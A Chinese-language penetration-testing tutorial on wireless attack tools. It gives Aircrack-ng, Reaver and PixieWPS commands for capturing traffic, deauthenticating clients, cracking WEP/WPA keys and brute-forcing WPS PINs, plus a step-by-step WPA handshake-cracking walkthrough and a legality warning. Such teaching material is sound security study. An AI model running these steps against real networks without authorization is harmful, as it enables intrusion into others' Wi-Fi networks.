技術文章 » [滲透測試]—6.3 無線網路滲透測試工具

[滲透測試]—6.3 無線網路滲透測試工具

2023-06-27 15:00:56

在本章節中,我們將學習一些常用的無線網路滲透測試工具,如Aircrack-ng、Reaver等。我們將盡量講解得詳細、通俗易懂,並提供儘可能多的範例。

6.1 Aircrack-ng套件

Aircrack-ng是一個用於測試無線網路安全的工具集,包括捕獲封包、破解WEP和WPA/WPA2-PSK金鑰、建立和管理存取點等功能。以下是Aircrack-ng套件中的一些主要工具:

6.1.1 airmon-ng

airmon-ng用於管理無線網路卡的監視模式。監視模式允許無線網路卡捕獲所有附近的無線流量,而不僅僅是與其連線的網路。

啟用監視模式:

airmon-ng start wlan0

此命令將啟用名為wlan0的無線網路卡的監視模式,並建立一個名為wlan0mon的新介面。

6.1.2 airodump-ng

airodump-ng用於捕獲無線網路的封包,包括SSID、BSSID、通道、加密型別等資訊。

掃描附近的無線網路:

airodump-ng wlan0mon

此命令將使用名為wlan0mon的監視介面掃描附近的無線網路,並顯示SSID、BSSID、通道、加密型別等資訊。

捕獲目標網路的封包:

airodump-ng -c [channel] --bssid [BSSID] -w [output_file] wlan0mon

此命令將捕獲指定通道和BSSID的目標網路的封包,並將其儲存到output_file中。

6.1.3 aireplay-ng

aireplay-ng用於傳送封包以生成流量,有助於加快破解WEP和WPA/WPA2-PSK金鑰的過程。

執行WEP攻擊:

aireplay-ng -3 -b [BSSID] wlan0mon

此命令將對指定BSSID的目標網路執行ARP請求重注入攻擊,以生成足夠的封包進行WEP破解。

執行WPA/WPA2-PSK攻擊:

aireplay-ng -0 1 -a [BSSID] -c [client_MAC] wlan0mon

此命令將對指定BSSID的目標網路傳送解除認證封包,迫使使用者端重新認證並捕獲握手封包。

6.1.4 aircrack-ng

aircrack-ng用於破解WEP和WPA/WPA2-PSK金鑰。

破解WEP金鑰:

aircrack-ng [output_file]-01.cap

此命令將嘗試破解捕獲到的WEP封包,以獲取WEP金鑰。

破解WPA/WPA2-PSK金鑰:

aircrack-ng -w [wordlist] [output_file]-01.cap

此命令將使用字典檔案wordlist嘗試破解捕獲到的WPA/WPA2-PSK握手封包,以獲取WPA/WPA2-PSK金鑰。

6.2 Reaver

Reaver是一個用於破解WPS PIN碼的工具,進而獲取WPA/WPA2-PSK金鑰。Reaver利用WPS設計的漏洞,通過暴力破解PIN碼來實現攻擊。

使用Reaver破解WPS PIN碼:

reaver -i wlan0mon -b [BSSID] -vv

此命令將使用名為wlan0mon的監視介面,針對指定BSSID的目標網路,嘗試破解WPS PIN碼。

6.3 PixieWPS

PixieWPS是一個用於利用WPS漏洞的工具,可以與Reaver一起使用,使WPS攻擊更加高效。

使用Reaver和PixieWPS進行WPS攻擊:

reaver -i wlan0mon -b [BSSID] -c [channel] -K 1 -vv

此命令將使用名為wlan0mon的監視介面,針對指定通道和BSSID的目標網路,嘗試破解WPS PIN碼,並使用PixieWPS進行高效攻擊。

6.4 Wireshark

Wireshark是一個功能強大的網路協定分析器,可以用於捕獲和分析封包,包括無線封包。

使用Wireshark捕獲無線封包:

  1. 開啟Wireshark。
  2. 選擇名為wlan0mon的監視介面。
  3. 開始捕獲封包。

6.5 實戰案例

以下是一個使用Aircrack-ng套件執行WPA/WPA2-PSK攻擊的實戰案例:

  1. 啟用監視模式:
airmon-ng start wlan0
  1. 掃描附近的無線網路:
airodump-ng wlan0mon

找到目標網路的BSSID和通道,例如BSSID為12:34:56:78:9A:BC,通道為6。

  1. 捕獲目標網路的封包:
airodump-ng -c 6 --bssid 12:34:56:78:9A:BC -w output wlan0mon
  1. 傳送解除認證封包以捕獲握手封包:
aireplay-ng -0 1 -a 12:34:56:78:9A:BC -c 01:23:45:67:89:AB wlan0mon

其中,01:23:45:67:89:AB是目標網路使用者端的MAC地址。

  1. 使用字典檔案破解握手封包:
aircrack-ng -w wordlist.txt output-01.cap

如果破解成功,將顯示WPA/WPA2-PSK金鑰。

請注意,無線網路滲透測試應該在合法範圍內進行。在沒有授權的情況下攻擊他人的無線網路是違法的。在學習和實踐過程中,請確保自己遵守當地法律法規,以免觸犯法律。

總結:在本章節中,我們詳細介紹了無線網路滲透測試工具,如Aircrack-ng、Reaver等,並提供了範例來幫助你更好地理解這些工具的使用方法。希望這些內容對你有所幫助,讓你能夠掌握無線網路滲透測試的基本技能。
推薦閱讀:

https://mp.weixin.qq.com/s/dV2JzXfgjDdCmWRmE0glDA

https://mp.weixin.qq.com/s/an83QZOWXHqll3SGPYTL5g